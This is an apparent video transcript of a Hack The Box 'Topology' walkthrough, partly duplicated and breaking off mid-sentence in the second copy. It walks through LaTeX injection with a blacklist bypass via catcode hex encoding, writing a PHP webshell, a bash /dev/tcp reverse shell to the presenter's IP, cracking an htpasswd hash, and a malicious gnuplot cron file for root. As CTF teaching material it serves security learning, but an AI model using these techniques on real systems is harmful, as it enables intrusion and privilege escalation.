Topology from Hack the Box Walkthrough

what's going on YouTube this is ipag you're doing topology from hack the box which starts off with finding a latch generator if you don't know what latch is think of it like a um over complicated version of markdown that just lets you have a bunch of syntax to create documents it's popular in the scientific Community because you can control exactly how documents look and use all the special characters and mathematical formulas and such right um the syntax does have some things that lets you like include files and execute code there is a filter that prevents you from using a lot of the dangerous functions which I'll find a bypass for later in this video that I don't think is on a lot of website is part of it unintended so we can bypass the filter the intended way is you include falls off the server eventually find the Apache config that has a HT passwd location which you can crack the password and then log in the server with SSH from there you discover a KRON is running gnu plot on every minute I think and you can put a malicious plot file up to get code execution as root so with that being said let's just jump in as always we're going to start off with an end map so- SE for default scripts SV enumerate versions OA output all formats put in the end map directory and call it topology and then the IP address of 10101 11217 this can take some time to run so I've already ran it looking at the results we have two ports open the first one being SSH on Port 22 and its Banner tells us it's an auntu server we also have HTTP on Port 80 it's bar tells us it's running Apache also on Ubuntu and we have some other things like the HTTP title script that says the um page that's a university so let's just go take a look at the web server so 1010 11217 and we get a page it looks like it is indeed a university the Department of Mathematics and has some information here and they're talking about software projects they have done and they have a latch equation generator um it's pronounced latch or latek it's not latex as I used to always call it I always got looks whenever I C it that um it's like a old version of markdown like markdown is a simplified version of latac I guess I should say uh this has been around since like the early or mid 80s which is older than me uh if we click on it uh it does not resolve because it is DNS so let us do pseudo host and we can add this host name in so 101 11 to7 can put it in and essentially why say it's kind of like marked down is you write more formulas in your document and it controls the exact Precision of where it exists so like if you ever played with Microsoft Word or any what you see as what you get editor and you're like trying to fight line spacing things like that to get things looking good or maybe just a bunch of special characters like we see here um you don't have that in lotch because you have much more control over it the x is actually not the letter X it's the Greek letter Kai spelled that way it's like the X with some squigglies on it uh because you could actually put that in here so that's why is called Latch um but let's just go and see this if we just say hello world and click generate let's see exactly what happens uh we just get Hello World it prints that out they give us a few things we could try so we can try like SL fraction and it's just going to Output kind of these images right so anytime that we can control what goes into something I always like can we like include files run commands things like that so I'm going to Google Latch um Hax and see if hact Trix has a page for just typical injections and it looks like it does right we have this formula CSV document go script and latch is one of them so let's go to the page we can search it and I'm just hitting enters till we go down in the page where it exists and we have it so we have like reading files multiple lines writing files command execution command execution sounds great uh we do SL immediate SLR 18 so let us put that in if we go here let's just try writing a file and immediately we get illegal command detected so it looks like they have some type of filtering in place I'm going to try like Slim I don't know if this is a command but I just want to see what happens and we get nothing let's try immediate and we get illegal command so they definitely do have black listing of certain commands if we try like what is Right file probably like Slash new right we may need so if we try this uh that does not Blacklist so that looks good we can try some other things we'll need to like slop out and we also need a SLR so we can try those to see if any of these commands are blacklisted we have open out we do slash WR we get illegal command detected so if we wanted to evade the filter for writing a file we'd have to do a lot of Googling around to see if we can avoid this SLR and there is a way around this filter that I found I don't know if it's documented on any website so it's really cool we'll do that after we go into the intended way so the intended way is reading files but I didn't find it by just playing with it as you saw here I kind of automated it so I created a word list so let's do word list. text and then we can put all the things so like input um include and we need to put backs slashes first and I'm probably going to pause the video and I'll just um type all these in because this probably isn't entertaining for you so let's just speed things up and now we have a decent word list of a bunch of potentially malicious commands we can do with lotac so let's save that and what we want to do is grab this URL so I'm going to grab this and we use fuff so we'll do fuff and then we do Dash um U for URL HTTP is it LW tech. topology htb I already had the whole thing on my clipboard darn uh let's get rid of there and then we can put fuzz here here and then we'll do DW for word list and I'm just going to say word list so we'll just run this real quick and see what it shows and we either have a size of zero or 32 44 um size of zero probably means um like the command failed like if we just did Slash read it did like this weird um contain something it like it contains errors right I bet if we did a curl hold on let's do curl DV we just get 200 okay it says there's an image but it didn't actually put the image here so that's what happens there so what we can see is these are probably not blacklisted this is probably the size of the illegal commands image so I'm going to do A- fs and then 3244 and you should always probably put your URLs here in single quotes I did not do it but if a command like had two params I didn't and then weird things would happen in bash so you should always put um that in single quotes so let's filter the strings for 3244 and this is going to show us everything we can do so we can read open close um we have this list input listing so if we try this so if we do equation list input listing if we went back here we could see what it is so we just do that and then specify a file so we do list input listing Etsy passwd we still get an error right so what's happening here is it's not it's just grabbing this it's not putting it in line with the text and to do that you use the dollar sign before and after the payload and now that's going to tell it hey grab this and put it in line with the text and and we have the past WD file so the next logical thing to do would be trying to grab equations. PHP so I'm going to copy this and we're just going to put it here because right now my assumption is um my working directory is the web rout it doesn't look like it is I may try like a DOT do slash and it's taking a bit longer so maybe that works um if we also went to just the page lat. toy. htb it is a open directory listing we can see temp files um if we look at equation we could look at these files I don't think we actually benefit that much from it but we have the file here so this is going to be the source code um I just want to do this one more time and show you one other thing we look in temp files it is empty but we run this and then it's going to start generating information in the temp file that's used to create that um picture we see here right and then after we get the picture the temp file will get deleted there's a PDF there's a PNG click the PNG it's already deleted but that's what this is so scrolling to where the PHP code is we can see the actual Source we have a filter strings right here and these are all the blacklisted commands and looking through this I don't really see any exploit path since the application was writing in this temp files directory the very first thing I was looking for is is there a way we can control the file name right but if I look here we see file ID is equal to Unique rand. true so it's just getting a random value it goes in here append do uh the text format so I don't think we have any way of writing like a PHP script here because um we don't control the file name at least with the um basic input with the slri command we will be able to create a PHP script and again we will do that in probably five minutes right so the next step is um finding other host or on this server and I kind of skipped that so while I was poking at this I would probably recommend also using fuff to look at virtual host right so if you did that you always want to have some type of Recon going on in the background how many times have I said that right so let's run a fuff and then we to do- for the URL and then DH will specify um hoston fuzz. topology htb and then the word list we'll use is opt secist Discovery uh DNS and we'll do DN uh subdomain top 1 million 5,000 text so if we run this and then let's just do uh filter size for 6767 because that's the most common one here actually I think buff does have something cool that I have not shown um let's see auto so we have this filter Auto calibration I'm going to try that I haven't actually done that it's just going to make a few requests and decide what you want to filter right that's awesome right it's filtering words for one 162 or 1612 175 and 6767 so it kind of figures out what the most common response is and hides that from you so we can see there is a Dev and a stat subdomain so if we did pseudo viy host to add the dev and stats to a host file so we can query it uh stats. topology htb and we'll go to Dev topology htb uh whoops HTTP Dev topology HTTP it's asking us for a credential if we did stats it's thinking it's going to give us the server load of the box so it's just an image here so knowing that there is different subdomains the next thing I would be doing is trying to look look at the Apache config to see if we can get anything I'd also probably look at Etsy host CU a lot of times like they may put all the host names in the host file so I'm going to include do Etsy oh I don't want to do do slash I just want to do SL Etsy host and we'll see if any domains are here doesn't look like there is so the next place would be the Apache config so if we do Etsy Apache 2 cuz I have it installed on my box we can look at sites enabled and the default place is going to be this 000000 dfa.com if I didn't see it here I would try like um latch.com and dev.com and just start guessing names in this directory but let's just first try this so we'll do sites enabled and then default. com it's going to take some time and it doesn't look like it pulled let's just um copy and paste I I always like doing that instead of typing because I am notorious for making typers it's taking some time and there we go I must have made a tyer before right that's why we always use copy and paste when we can so here is the Apache config and we can see there is a ver dubdub duub lch that's going to be the equation generator page here is ver dubdub du Dev and then we also have dubdub duub stats so they could have put the password either in this config or they can also put it in the probably HT passwd file of the directory so I'm going to go to ver dubdub dubd sl. HT um I'll try access first because HT access is where you control um the rights to it right and we can see it is putting authorization we have all type basic so it wants HTTP basic Authentication here's the user file V Dev HT passwd and require valid user so if we try to grab this HT passwd it's thinking and we have this we could just type this hash out in our computer send it over to hashcat and crack it but I'm not going to do that because I I'm notorious with typers right that's a lot to do and I know a different way to exploit this box and if we get a shell in the Box we can just copy and paste it right so that's that's going to be a lot more fun right and again I didn't see this exactly on um any like known bypasses but it's one of those that once you start looking into it it's so obvious I would be surprised if it's not so I'm going to try taking down the journey that I went through trying to find this um bypass because as I've said before that's what I view is important is the methodology to find information you want in hacking you're not going to memorize everything but as long as you can just um do good Googling I think you'll do fine so the first thing I did was I started off with like um latex evasion uh bypass let's just try searching this I don't know exactly what's going to come up here um we have security and autogenerated this is a hack trick page this zero day. work I don't think is going to work because the domain is dead um so this one is talking about special characters so we have like this character and it replaces with text asky um something so I was my first thought was okay I can like start using fuff with a um word list of a bunch of these special uni code characters and then maybe if like I find one character that is the equivalent of slwr I can finish it with an it and have a SLR command unfortunately this page goes so slow and it took so long to do this and I don't even know if there is I think the auth did a good job at highlighting the good ones and I don't think this is a um good thing he does list a bunch of other resources to read we see this OD day one does not work but typically when that happens I click the three dots here uh let's see got the source where is the cash um I wonder if cash isn't available if I'm not logged in oh there we go cash is down here so this is going to pull the cach of the page if this doesn't go I go to like archive.org but let's see there was another one I Google like bypass latex filters or latch you can see I used to call it latex for so long it is habit um if I went here there is a Twitter post here and I don't think this is going to show well because I don't think I'll be able to click on his actual um profile because X does weird things if you're not logged in but we see um skirts talking about it or I don't know how to pronounce his name he follows me so if you're watching this video thank you for this blog post um I wish X let me click it but we will go to his domain which I want to say is uh skirts. rocks because well he does rock and if we go over to the blog we can find it and this blog takes us like probably 90% of the way there it's got a really cool bypass and he uses something called called um the cat code and before here he's talking about the shell Escape um the actual default is going to be shell restricted which means there's only a safe uh set of commands being able to be run so that's why once we find the bypass we still won't be able to use like slri 18 to get a reverse shell because that only allows certain commands to be ran um but we will be able to write a PHP file so what he is doing here is he's using cat code and then you do this backtick and that lets you say hey I want to specify it in I'm going to say asky format I may be wrong with that but you specify it with asky format and he sends the control character back slash and does equal seven and what he says here is it makes the at sign now behave as a superscript and when a superscript is in um latch if you do that twice then type something it's going to be the heximal value right right so what he does is say hey this sign is now superscript and let's do um hex right so he has input but the p is encoded in HEX right so if I tried this the back slash a unfortunately was on a um Blacklist right illegal command so I was searching like latch uh superscript because I was kind of curious exactly what that was I think this will bring me to the page um let's see no I was searching at cat code cuz he used cat code I didn't know exactly what cat code was we go to their Wiki page and it's going to talk about it because my first thought was can I do cat code any other way um this is not showing it to me I want to say the other post does the top one asking the difference between what's cat code and Cat code fact so it's saying cat code 65 is the same thing as cat code backtick a and if we did man asky looked at a we can see that is going to be the decimal notation of a so I was trying really hard to find the decimal notation of backs at unfortunately if we did um with the decimal of backslashes and the back decimal notation of it doesn't work I don't know exactly why um let's see what is it I was trying probably 90265 because 65 was no what is at now search uh 64 so I was trying 9264 and that did not work so the reason is I think you can only just use one character here and back SL a is two and there's no like decimal notation for that pair but I got over to this page which was the next one down and at is normally going to be 13 I found that out through chat GPT um so they redefined it to be superscript but it says superscript is normally just a carrot right so that would mean if we um did something W 2 Karat and 70 and generate this it's not going to say 70 it's going to say p right so that looks good this looks very promising so we could go back to a slash input what was it LST input listing Etsy passwd so the next thing I want to do is make sure this bypass works with um a command I need to put this in inline mode there we go so I'm going to take this p and we'll do 2 carats and 70 so in case the text is small there for you uh what I put it to is that right so I just replace the p with this and it still works so now we have a potential way to bypass the filter um this page doesn't want to load uh if you did view this this one talked about um rating of definition file and then using that definition file to rename commands unfortunately um doesn't help us so this does though so we can do the heximal thing so let's go back to hack Trix so hack Trix uh the CSV injection I'm going to search latex come on I made a mistake of clicking the page come on maybe I'll just scroll down passed it oh I'm not even on that page anymore I don't know what I clicked that's why there we go so we could try the executing code but I know it doesn't work so I'm not going to waste your time um let's try writing a file so I'm going to copy this and first we're going to show this does not work so V malicious. text we'll paste it and we're going to do outfile uh we'll do shell do PHP and we will write PHP system actually before we do that let's just write hello world let's prove we can write things if we over complicate our payload then um it may fail and we won't know why it failed so let's keep it as simple as possible so we have this and then we want to put this all on one line so we're trying to write shell. PHP so let's grab this copy let's go to the equation and I'm just going to paste it there and we see illegal command detected so looking at this I see e is pretty much in everything so that's going to be the thing I replace so let's try viewing this I'm going to use a search and replace we'll say e is now uh what is e INX uh it's 65 go g so now we've replaced all e with that so let's C this again we will copy it and paste so copy paste and I'm hoping we get like a blank page or some generic error right there we go we got a blank page so now we got to find where that shell. PHP is so we can do shell. PHP it is not in the web rot but if we studied the code better I did it because it was in PHP you'll notice it did a CD to Temp files and that's what it is the size is 12 to so we wrote to it so if we click it it just says hello world so now let's edit this and let's replace hello world with her reverse shell or just a um Cradle so we can launch it so we do PHP system then request CMD and we want to end it and we'll do a semicolon there so we just put something to execute we can C it let's send it back over to the web server so if we send this it's thinking about it it's still thinking about it there we go it finished finished the file is blank but if we do CMD equals ID it doesn't work uhoh um I screwed something up here so PHP system request CMD I'm not going to put that semicolon let's try that still not curse of the demo Gods so PHP system request let's see so what I'm going to do is stand at my own web server so make D dubdub dub v test PHP paste the script in I see it now syntax highlighting save me I don't have a parthy there so what I was going to do since I guess this is good troubleshooting uh we can do PHP DS um 8000 dot let's see colon 8000 Network address is it 127 001 there we go so now we stirred up a PHP server on Local Host so this is very much like the python simple HTTP server except um it can execute PHP code and we still can't opening period maybe I don't put the path in let's just try that just put the IP address there we go that looks better so I did CMD ID um it works the actual code we had though did not have that parenthese right so if I had not notice that and we are running it we would see syntax error um it expected a parenthesis so that's what's happening uh let's go back to our right I can add that Pary in and then once that's done we can just do the CMD command and everything is going to work there we go so now we get a reverse shell I always um go through burp because I like just doing it in a post request if I can and the reason why I like that is because there's just less Bad characters in a post request right so I can do B- C b-i Dev TCP 10148 9,10 and one like that let's encode everything and then we can say NC LVN P 91 send this and we get a shell so let's do python 3-c import PTY PTY spawn bin bash stty raw minus Echo FG we going export terms equal to X terms so we can clear the screen but now we're on the server right so if I wanted to get that one file we did before that was in Dev that we just saw an image that HT passed w we can the reason why I don't see it in that LS of course is um it hides files that begin with a period by default right but now that we have the hash we could try to crack it right and this actually isn't needed if you got the shell this way um you're golden right so let's do V hashes and I'll call this um HT passwd topology paste that in we can do slash cat and then we're going to specify D- username because we put the username in with our hash um that wasn't actually part of it right if I just copied this I wouldn't need the D- username flag but whenever I crack things I like adding the username as well so when I go back and look at notes I can see what that hash went to so the next thing we do is just specify the hash file and then the word list op wordlist rock. text and hashcat is going to autod detect it and if you're curious how I just type that directory so fast I did alt period so if we do Echo Please Subscribe and I hit alt period it's going to grab that very last argument I typed which was the path there so that's how I did that so quickly we can see it cracked we can scroll up and we see the password is calculus 20 and then if I wanted to we could get rid of R of the dictionary I could just do a D- show and it will just tell me what's in my pot file that is V daisley here's the hash and the password of calculus 20 so with that we could log into dev. toy. HTP um I'm in BP Suite let's turn this off HTTP Dev topology http and then was it V daisley the password and it's just a static website right but this does go over to SSH so if we were like spraying passwords as we crack them we could try uh V daisley at topology htb um I did not add that into it we could do the IP address or just any subdomain because that goes to the IP put in V DA's password and we get logged in so from here there's no difference um dubdub data will be able to do everything that this SSH connection can do um the next step is actually running peace bu to discover a cron but we've done that a bunch of other times if you don't know what I'm talking about about peace buy just go to like ic. Ro type in peace buy and oh my God we run that a lot it's a really cool tool that shows you when programs run right but I'm going to do it a slightly different way um have the dubdub DU directory right I do so I'm going to copy opt peas Lin peas. over here and we're going to edit Lin peas because there are a few options that are just defaults and one of them is going to be fast by default it's set to one which means um it's not going to wait one minute to check processes and try Su Brute Forces so let's unset fast so when we unset it a new Option will appear here to us so let's stand up our web server python 3- mhtp server uh PHP is listening on it where are you PHP kill you start that up Cur Local Host 8000 uh Lin peas. sh type it over to bash uh I don't know why it's type Local Host it's 101048 which is my IP address there we go so LMP is running I do want to put one word of caution out there if you use this PHP thing again it can execute code if you have PHP scripts in like I do with that test.php if someone saw that and they executed it uh they could shell my box right so I typically avoid using this PHP server when I do I always always always specify 1271 don't do 0000 because you risk um getting yourself owned right so let's just wait for this Lin peas to finish it's definitely not in fast mode now so it's going to take a little bit to run so I'm going to pause the video in order to zoom when it's done okay so lint peas is done I'm going to first I'm going to copy this because I like using this to jump around linp um sections and I'm going to search for Carlos because Carlos uh pet made it so now I can just search down for that um thing and we can just jump between all the sections is the best way I think to view lmes there's probably better ways but that's how I do it so we can look and there's nothing really too interesting there is this Linux exploit suggest I always say there's so many false positives there maybe one day I'll make a video on like why that's such a hard thing to do but it's not accurate so I only look at that if I'm really really stuck um we have the cleaned processes this is um unexpected processes run by root uh why' it say that this is just a list of processes um I guess that's telling us to look for weird and unexpected things right but there's not that many we can see our reverse shell we see Apache um not that much files open by um belong to other users none credentials in memory none different processes executed during 1 minute so this is where the fast check came in helpful right because we see KRON started and there is a GNU plot cron and it's going to find any file in op gnu plot that has a PLT extension and then execute it with this so this fine command what this does um the exec it executes gnu plot so this is the binary and this open and close squiggly is going to take the output of find so um let's see I can probably show that real quick cuz if you don't use find that often it is a tricky thing so we do find dot we have that if we do D exec and then we'll do LS and I think we have to do back slash semicolon so it just found that and did an LS if we do a cat it's going to cat all the files now right so again that exact the way it's doing it is just um taking the output on the left side and executing it between this hopefully that makes sense but you can see there's no unique crons that is a Chron that we don't have permission to read but because we're examining processes we were able to see it right so it does find and executes gnu plot so the next thing to do would be like searching um let's do GTFO bin see if it's there if we search for gnu plot it is not on GTFO bins so let's just do GT uh gnu plot commands and go to Google and research exactly what this is um it is if you don't know it's being used to generate these graphs right on the stats page so we have a quick reference this is a PDF here we go I want the commands so looking at this um which command looks interesting system system generally means run system commands and in this case it does right so we just do system and the command string so if we did um V let's say let's go Dev oh it was in what opt gnu plot and we don't have mission to read the directory if we do a lsla on opt any user well this is um user group and then anyone we have WX which is write execute which means we can go in the directory we can write to the directory if we do touch please subscribe it doesn't error out um we probably should have done please subscribe to test and we can cat it we can view it but since we don't have the read permission we can't list files in this directory um we can also get to it from a webshell right I cat test I can also do it so that's why I said we don't need to escalate to V daisly if we found the latex um bypass but having SSH is nice so let's just create a plot file so I'll create malicious. PLT we'll say system and then B- C Bashi Dev TCP 101048 901 like oops um I'm drawing a major uh FR front let's see what did I use to send the shell zero at and one right yeah that's all muscle memory once I made a tyer and I wasn't typing the whole thing I just completely forgot what it was weird okay so now we have the system NC lvmp 901 and I think this runs every minute so if we do a date it'll probably run in about 20 seconds so while we're waiting for that if we wanted to get the output of this um we could just use the direct right we could have done um system who am I and then piped it like that and piped to a file right but if we wanted to we could also look in um is it show no we want to look at print because g& plot does allow you to set print to files right so we have print expression this is just like Echo but if we do set print we can see there are different ways to do it right I bet if we did set print and then shell command when we type print it'll get the output of that shell command as well so that's another way we could have executed code if system is blacklisted right because we can do this and this is kind of like a pearl thing I think Pearl is one of the few languages I've seen that like if you Preen variables with a pipe then it executes command it's very weird um that does not look like it worked U bash C b-i Dev TCP 101 1480 and one like that that that should work um see name. PLT cat malicious it's not there anymore is oh tab auto complete doesn't work because of reasons right because we don't have rep permission so I'm going to try gnu plot on this file GN U plot invalid command is it lowercase uh let's see system it may be lowercase there we go we got a shell so now we just wait for the timer there we go it was a new minute right there and we got root so that is pretty much the box if you wanted to see using the print um we could do V malicious. PLT and then something like set print uh let's do Dev shm [Music] pwned we'll say output is equal to system let's just do a who am I and then print output so what that's going to do is we set the print command to say hey we don't want to print the standard out we want to print to this file and then we're running this system command and saying um put the system command in the output variable and then we're saying print the output variable think that is right let's see if we go back to print I think that works Let's see we saved it date uh I think a new minute did pass so Dev shm that did not work V opt gnu plot malicious. PLT let's see uh we probably need to do a dollar sign and these are things I like doing after I solve the Box again like when I found that latch bypass I had solved the Box the intended way but um I wanted to do it the unintended way as well and they're doing system in parenthesis so let's try that as well mirroring this exactly as they have right date we still don't have it gnu plot malicious. PLT cannot open script file oh um up gnu plot that is probably because we didn't put it in parentheses so always test your code right uh no data block named output so now it's working so devm poned is currently V da if I wait the one more section that worked well it is now rout so that is how you can get it to Output to a file hopefully you enjoyed the little bit of debugging session to figure out how that all works um take care guys and I will see you all next time

what&#39;s going on YouTube this is ipag you&#39;re doing topology from hack the box which starts off with finding a latch generator if you don&#39;t know what latch is think of it like a um over complicated version of markdown that just lets you have a bunch of syntax to create documents it&#39;s popular in the scientific Community because you can control exactly how documents look and use all the special characters and mathematical formulas and such right um the syntax does have some things that lets you like include files and execute code there is a filter that prevents you from using a lot of the dangerous functions which I&#39;ll find a bypass for later in this video that I don&#39;t think is on a lot of website is part of it unintended so we can bypass the filter the intended way is you include falls off the server eventually find the Apache config that has a HT passwd location which you can crack the password and then log in the server with SSH from there you discover a KRON is running gnu plot on every minute I think and you can put a malicious plot file up to get code execution as root so with that being said let&#39;s just jump in as always we&#39;re going to start off with an end map so- SE for default scripts SV enumerate versions OA output all formats put in the end map directory and call it topology and then the IP address of 10101 11217 this can take some time to run so I&#39;ve already ran it looking at the results we have two ports open the first one being SSH on Port 22 and its Banner tells us it&#39;s an auntu server we also have HTTP on Port 80 it&#39;s bar tells us it&#39;s running Apache also on Ubuntu and we have some other things like the HTTP title script that says the um page that&#39;s a university so let&#39;s just go take a look at the web server so 1010 11217 and we get a page it looks like it is indeed a university the Department of Mathematics and has some information here and they&#39;re talking about software projects they have done and they have a latch equation generator um it&#39;s pronounced latch or latek it&#39;s not latex as I used to always call it I always got looks whenever I C it that um it&#39;s like a old version of markdown like markdown is a simplified version of latac I guess I should say uh this has been around since like the early or mid 80s which is older than me uh if we click on it uh it does not resolve because it is DNS so let us do pseudo host and we can add this host name in so 101 11 to7 can put it in and essentially why say it&#39;s kind of like marked down is you write more formulas in your document and it controls the exact Precision of where it exists so like if you ever played with Microsoft Word or any what you see as what you get editor and you&#39;re like trying to fight line spacing things like that to get things looking good or maybe just a bunch of special characters like we see here um you don&#39;t have that in lotch because you have much more control over it the x is actually not the letter X it&#39;s the Greek letter Kai spelled that way it&#39;s like the X with some squigglies on it uh because you could actually put that in here so that&#39;s why is called Latch um but let&#39;s just go and see this if we just say hello world and click generate let&#39;s see exactly what happens uh we just get Hello World it prints that out they give us a few things we could try so we can try like SL fraction and it&#39;s just going to Output kind of these images right so anytime that we can control what goes into something I always like can we like include files run commands things like that so I&#39;m going to Google Latch um Hax and see if hact Trix has a page for just typical injections and it looks like it does right we have this formula CSV document go script and latch is one of them so let&#39;s go to the page we can search it and I&#39;m just hitting enters till we go down in the page where it exists and we have it so we have like reading files multiple lines writing files command execution command execution sounds great uh we do SL immediate SLR 18 so let us put that in if we go here let&#39;s just try writing a file and immediately we get illegal command detected so it looks like they have some type of filtering in place I&#39;m going to try like Slim I don&#39;t know if this is a command but I just want to see what happens and we get nothing let&#39;s try immediate and we get illegal command so they definitely do have black listing of certain commands if we try like what is Right file probably like Slash new right we may need so if we try this uh that does not Blacklist so that looks good we can try some other things we&#39;ll need to like slop out and we also need a SLR so we can try those to see if any of these commands are blacklisted we have open out we do slash WR we get illegal command detected so if we wanted to evade the filter for writing a file we&#39;d have to do a lot of Googling around to see if we can avoid this SLR and there is a way around this filter that I found I don&#39;t know if it&#39;s documented on any website so it&#39;s really cool we&#39;ll do that after we go into the intended way so the intended way is reading files but I didn&#39;t find it by just playing with it as you saw here I kind of automated it so I created a word list so let&#39;s do word list. text and then we can put all the things so like input um include and we need to put backs slashes first and I&#39;m probably going to pause the video and I&#39;ll just um type all these in because this probably isn&#39;t entertaining for you so let&#39;s just speed things up and now we have a decent word list of a bunch of potentially malicious commands we can do with lotac so let&#39;s save that and what we want to do is grab this URL so I&#39;m going to grab this and we use fuff so we&#39;ll do fuff and then we do Dash um U for URL HTTP is it LW tech. topology htb I already had the whole thing on my clipboard darn uh let&#39;s get rid of there and then we can put fuzz here here and then we&#39;ll do DW for word list and I&#39;m just going to say word list so we&#39;ll just run this real quick and see what it shows and we either have a size of zero or 32 44 um size of zero probably means um like the command failed like if we just did Slash read it did like this weird um contain something it like it contains errors right I bet if we did a curl hold on let&#39;s do curl DV we just get 200 okay it says there&#39;s an image but it didn&#39;t actually put the image here so that&#39;s what happens there so what we can see is these are probably not blacklisted this is probably the size of the illegal commands image so I&#39;m going to do A- fs and then 3244 and you should always probably put your URLs here in single quotes I did not do it but if a command like had two params I didn&#39;t and then weird things would happen in bash so you should always put um that in single quotes so let&#39;s filter the strings for 3244 and this is going to show us everything we can do so we can read open close um we have this list input listing so if we try this so if we do equation list input listing if we went back here we could see what it is so we just do that and then specify a file so we do list input listing Etsy passwd we still get an error right so what&#39;s happening here is it&#39;s not it&#39;s just grabbing this it&#39;s not putting it in line with the text and to do that you use the dollar sign before and after the payload and now that&#39;s going to tell it hey grab this and put it in line with the text and and we have the past WD file so the next logical thing to do would be trying to grab equations. PHP so I&#39;m going to copy this and we&#39;re just going to put it here because right now my assumption is um my working directory is the web rout it doesn&#39;t look like it is I may try like a DOT do slash and it&#39;s taking a bit longer so maybe that works um if we also went to just the page lat. toy. htb it is a open directory listing we can see temp files um if we look at equation we could look at these files I don&#39;t think we actually benefit that much from it but we have the file here so this is going to be the source code um I just want to do this one more time and show you one other thing we look in temp files it is empty but we run this and then it&#39;s going to start generating information in the temp file that&#39;s used to create that um picture we see here right and then after we get the picture the temp file will get deleted there&#39;s a PDF there&#39;s a PNG click the PNG it&#39;s already deleted but that&#39;s what this is so scrolling to where the PHP code is we can see the actual Source we have a filter strings right here and these are all the blacklisted commands and looking through this I don&#39;t really see any exploit path since the application was writing in this temp files directory the very first thing I was looking for is is there a way we can control the file name right but if I look here we see file ID is equal to Unique rand. true so it&#39;s just getting a random value it goes in here append do uh the text format so I don&#39;t think we have any way of writing like a PHP script here because um we don&#39;t control the file name at least with the um basic input with the slri command we will be able to create a PHP script and again we will do that in probably five minutes right so the next step is um finding other host or on this server and I kind of skipped that so while I was poking at this I would probably recommend also using fuff to look at virtual host right so if you did that you always want to have some type of Recon going on in the background how many times have I said that right so let&#39;s run a fuff and then we to do- for the URL and then DH will specify um hoston fuzz. topology htb and then the word list we&#39;ll use is opt secist Discovery uh DNS and we&#39;ll do DN uh subdomain top 1 million 5,000 text so if we run this and then let&#39;s just do uh filter size for 6767 because that&#39;s the most common one here actually I think buff does have something cool that I have not shown um let&#39;s see auto so we have this filter Auto calibration I&#39;m going to try that I haven&#39;t actually done that it&#39;s just going to make a few requests and decide what you want to filter right that&#39;s awesome right it&#39;s filtering words for one 162 or 1612 175 and 6767 so it kind of figures out what the most common response is and hides that from you so we can see there is a Dev and a stat subdomain so if we did pseudo viy host to add the dev and stats to a host file so we can query it uh stats. topology htb and we&#39;ll go to Dev topology htb uh whoops HTTP Dev topology HTTP it&#39;s asking us for a credential if we did stats it&#39;s thinking it&#39;s going to give us the server load of the box so it&#39;s just an image here so knowing that there is different subdomains the next thing I would be doing is trying to look look at the Apache config to see if we can get anything I&#39;d also probably look at Etsy host CU a lot of times like they may put all the host names in the host file so I&#39;m going to include do Etsy oh I don&#39;t want to do do slash I just want to do SL Etsy host and we&#39;ll see if any domains are here doesn&#39;t look like there is so the next place would be the Apache config so if we do Etsy Apache 2 cuz I have it installed on my box we can look at sites enabled and the default place is going to be this 000000 dfa.com if I didn&#39;t see it here I would try like um latch.com and dev.com and just start guessing names in this directory but let&#39;s just first try this so we&#39;ll do sites enabled and then default. com it&#39;s going to take some time and it doesn&#39;t look like it pulled let&#39;s just um copy and paste I I always like doing that instead of typing because I am notorious for making typers it&#39;s taking some time and there we go I must have made a tyer before right that&#39;s why we always use copy and paste when we can so here is the Apache config and we can see there is a ver dubdub duub lch that&#39;s going to be the equation generator page here is ver dubdub du Dev and then we also have dubdub duub stats so they could have put the password either in this config or they can also put it in the probably HT passwd file of the directory so I&#39;m going to go to ver dubdub dubd sl. HT um I&#39;ll try access first because HT access is where you control um the rights to it right and we can see it is putting authorization we have all type basic so it wants HTTP basic Authentication here&#39;s the user file V Dev HT passwd and require valid user so if we try to grab this HT passwd it&#39;s thinking and we have this we could just type this hash out in our computer send it over to hashcat and crack it but I&#39;m not going to do that because I I&#39;m notorious with typers right that&#39;s a lot to do and I know a different way to exploit this box and if we get a shell in the Box we can just copy and paste it right so that&#39;s that&#39;s going to be a lot more fun right and again I didn&#39;t see this exactly on um any like known bypasses but it&#39;s one of those that once you start looking into it it&#39;s so obvious I would be surprised if it&#39;s not so I&#39;m going to try taking down the journey that I went through trying to find this um bypass because as I&#39;ve said before that&#39;s what I view is important is the methodology to find information you want in hacking you&#39;re not going to memorize everything but as long as you can just um do good Googling I think you&#39;ll do fine so the first thing I did was I started off with like um latex evasion uh bypass let&#39;s just try searching this I don&#39;t know exactly what&#39;s going to come up here um we have security and autogenerated this is a hack trick page this zero day. work I don&#39;t think is going to work because the domain is dead um so this one is talking about special characters so we have like this character and it replaces with text asky um something so I was my first thought was okay I can like start using fuff with a um word list of a bunch of these special uni code characters and then maybe if like I find one character that is the equivalent of slwr I can finish it with an it and have a SLR command unfortunately this page goes so slow and it took so long to do this and I don&#39;t even know if there is I think the auth did a good job at highlighting the good ones and I don&#39;t think this is a um good thing he does list a bunch of other resources to read we see this OD day one does not work but typically when that happens I click the three dots here uh let&#39;s see got the source where is the cash um I wonder if cash isn&#39;t available if I&#39;m not logged in oh there we go cash is down here so this is going to pull the cach of the page if this doesn&#39;t go I go to like archive.org but let&#39;s see there was another one I Google like bypass latex filters or latch you can see I used to call it latex for so long it is habit um if I went here there is a Twitter post here and I don&#39;t think this is going to show well because I don&#39;t think I&#39;ll be able to click on his actual um profile because X does weird things if you&#39;re not logged in but we see um skirts talking about it or I don&#39;t know how to pronounce his name he follows me so if you&#39;re watching this video thank you for this blog post um I wish X let me click it but we will go to his domain which I want to say is uh skirts. rocks because well he does rock and if we go over to the blog we can find it and this blog takes us like probably 90% of the way there it&#39;s got a really cool bypass and he uses something called called um the cat code and before here he&#39;s talking about the shell Escape um the actual default is going to be shell restricted which means there&#39;s only a safe uh set of commands being able to be run so that&#39;s why once we find the bypass we still won&#39;t be able to use like slri 18 to get a reverse shell because that only allows certain commands to be ran um but we will be able to write a PHP file so what he is doing here is he&#39;s using cat code and then you do this backtick and that lets you say hey I want to specify it in I&#39;m going to say asky format I may be wrong with that but you specify it with asky format and he sends the control character back slash and does equal seven and what he says here is it makes the at sign now behave as a superscript and when a superscript is in um latch if you do that twice then type something it&#39;s going to be the heximal value right right so what he does is say hey this sign is now superscript and let&#39;s do um hex right so he has input but the p is encoded in HEX right so if I tried this the back slash a unfortunately was on a um Blacklist right illegal command so I was searching like latch uh superscript because I was kind of curious exactly what that was I think this will bring me to the page um let&#39;s see no I was searching at cat code cuz he used cat code I didn&#39;t know exactly what cat code was we go to their Wiki page and it&#39;s going to talk about it because my first thought was can I do cat code any other way um this is not showing it to me I want to say the other post does the top one asking the difference between what&#39;s cat code and Cat code fact so it&#39;s saying cat code 65 is the same thing as cat code 